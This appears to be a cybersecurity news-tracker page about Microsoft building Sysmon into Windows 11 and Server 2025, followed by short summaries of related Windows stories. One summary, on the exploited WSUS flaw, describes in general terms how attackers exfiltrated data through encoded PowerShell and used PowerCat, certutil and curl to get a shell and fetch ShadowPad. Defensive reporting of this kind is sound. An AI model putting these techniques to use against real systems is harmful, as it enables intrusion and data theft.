CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Microsoft integrates Sysmon natively into Windows 11 and Server 2025

First reported
Last updated
1 unique sources, 3 articles

Summary

Hide ▲

Microsoft has integrated Sysmon (System Monitor) natively into Windows 11 and Windows Server 2025, eliminating the need for standalone deployment. This integration simplifies management and enhances threat hunting and diagnostics capabilities. The native support allows users to install Sysmon via Windows Update and manage it through the Optional Features settings. Microsoft also plans to release comprehensive documentation and introduce enterprise management features and AI-powered threat detection capabilities next year. Sysmon is a powerful tool for monitoring and logging events such as process creation, network connections, and file creation, which are crucial for detecting malicious activities. Users can enable Sysmon via the Command Prompt using the command 'sysmon -i' for basic monitoring, or use a custom configuration file for advanced monitoring. Additionally, Sysmon is now available as a built-in feature in Windows 11 and can be enabled through Settings or via command line. It is off by default and must be enabled before use. Users should uninstall any previously installed Sysmon from Sysinternals before enabling the built-in version.

Timeline

  1. 18.11.2025 19:25 3 articles · 3mo ago

    Microsoft integrates Sysmon natively into Windows 11 and Server 2025

    Microsoft announced the integration of Sysmon (System Monitor) natively into Windows 11 and Windows Server 2025, eliminating the need for standalone deployment. This integration will simplify management and enhance threat hunting and diagnostics capabilities. The native support will allow users to install Sysmon via Windows Update and manage it through the Optional Features settings. Microsoft also plans to release comprehensive documentation and introduce enterprise management features and AI-powered threat detection capabilities next year. Sysmon is a powerful tool for monitoring and logging events such as process creation, network connections, and file creation, which are crucial for detecting malicious activities. Users can enable Sysmon via the Command Prompt using the command 'sysmon -i' for basic monitoring, or use a custom configuration file for advanced monitoring. Additionally, Sysmon is now available as a built-in feature in Windows 11 and can be enabled through Settings or via command line. It is off by default and must be enabled before use. Users should uninstall any previously installed Sysmon from Sysinternals before enabling the built-in version.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Windows 11 KB5077241 Update Introduces BitLocker Improvements and Sysmon Tool

Microsoft released the KB5077241 optional cumulative update for Windows 11, featuring 29 changes, including BitLocker reliability enhancements, a new network speed test tool, and native System Monitor (Sysmon) functionality. The update also improves taskbar behavior, adds support for WebP images as desktop backgrounds, and introduces Remote Server Administration Tools (RSAT) for Windows 11 Arm64 devices. This preview update allows admins to test new features and improvements before they are generally available. The update is optional and does not include security fixes, focusing instead on quality improvements.

Open in new tab

Microsoft Introduces Cloud Rebuild and Point-in-Time Restore for Windows 11

Microsoft has announced two new recovery features for Windows 11: Cloud Rebuild and Point-in-Time Restore (PITR). These tools aim to reduce downtime and simplify system recovery from failures or faulty updates. PITR allows rolling back to a previous system snapshot, including files and applications. Cloud Rebuild enables remote reinstallation of Windows 11 via the cloud. Both features will integrate with Microsoft Intune by the first half of 2026. Additionally, Microsoft is enhancing Quick Machine Recovery (QMR) to improve boot failure resolution without physical access.

Open in new tab

Microsoft Enhances Quick Machine Recovery in Windows 11

Microsoft is testing an improved version of Quick Machine Recovery (QMR) in Windows 11, which now runs a single scan to fix booting problems instead of looping. This update is part of Microsoft's ongoing efforts to enhance system recovery capabilities. Additionally, Smart App Control (SAC) can now be toggled on and off without requiring a clean Windows install. QMR allows IT administrators to resolve Windows boot failures remotely, eliminating the need for physical access. The feature was introduced in November 2024 as part of Microsoft's Windows Resiliency Initiative, following a major outage caused by a CrowdStrike Falcon update in July 2024. These changes are currently being tested with Windows Insiders in the Dev and Beta channels.

Open in new tab

Critical WSUS RCE Vulnerability Exploited in the Wild

A critical remote code execution (RCE) vulnerability (CVE-2025-59287) in Windows Server Update Service (WSUS) is being actively exploited in the wild. The flaw allows attackers to run malicious code with SYSTEM privileges on Windows servers with the WSUS Server role enabled. Microsoft has released out-of-band patches for all affected Windows Server versions. Cybersecurity firms have observed exploitation attempts and the presence of publicly available proof-of-concept exploit code. The vulnerability is considered potentially wormable between WSUS servers and poses a significant risk to organizations. The flaw concerns a case of deserialization of untrusted data in WSUS. The vulnerability was discovered and reported by security researchers MEOW, f7d8c52bec79e42795cf15888b85cbad, and Markus Wulftange with CODE WHITE GmbH. CISA and NSA, along with international partners, have issued guidance to secure Microsoft Exchange Server instances, including recommendations to restrict administrative access, implement multi-factor authentication, and enforce strict transport security configurations. The agencies advise decommissioning end-of-life on-premises or hybrid Exchange servers after transitioning to Microsoft 365. Sophos reported threat actors exploiting the vulnerability to harvest sensitive data from U.S. organizations across various industries, with at least 50 victims identified. The exploitation activity was first detected on October 24, 2025, a day after Microsoft issued the update. Attackers use Base64-encoded PowerShell commands to exfiltrate data to a webhook[.]site endpoint. Michael Haag of Splunk noted an alternate attack chain involving the Microsoft Management Console binary (mmc.exe) to trigger cmd.exe execution. Recently, threat actors have been exploiting CVE-2025-59287 to distribute ShadowPad malware, a modular backdoor used by Chinese state-sponsored hacking groups. Attackers used PowerCat, certutil, and curl to obtain a system shell and download ShadowPad. The malware is launched via DLL side-loading and comes with anti-detection and persistence techniques.

Open in new tab

Microsoft October 2025 Patch Tuesday fixes 6 zero-days, 183 flaws

Microsoft's October 2025 Patch Tuesday marked the end of free security updates for Windows 10, addressing 183 vulnerabilities, including six zero-days, with the final cumulative update **KB5066791**. The update also introduced critical fixes for components like Windows SMB Server, Microsoft SQL Server, and Remote Access Connection Manager, alongside third-party vulnerabilities in AMD EPYC processors and IGEL OS. However, a newly disclosed **February 2026 Patch Tuesday** update fixed **CVE-2026-20841**, a high-severity remote code execution flaw in **Windows 11 Notepad** that allowed attackers to execute arbitrary programs via malicious Markdown links without security warnings. The flaw, affecting Notepad versions 11.2510 and earlier, exploited improper command neutralization to launch unverified protocols (e.g., `file://`, `ms-appinstaller://`). Microsoft mitigated the risk by adding execution warnings for non-HTTP(S) URIs, with updates distributed automatically via the Microsoft Store. Prior milestones included out-of-band patches for a critical **WSUS vulnerability (CVE-2025-59287)** with public exploit code, smart card authentication issues caused by cryptographic service changes, and a **RasMan zero-day** (DoS vulnerability) affecting all Windows versions. Windows 10 reached end-of-life, with Extended Security Updates (ESU) available for purchase, while Exchange Server 2016/2019 and Skype for Business 2016 also ended support. The October 2025 update remains the largest on record, with 183 CVEs pushing Microsoft’s annual vulnerability count past 1,021.

Open in new tab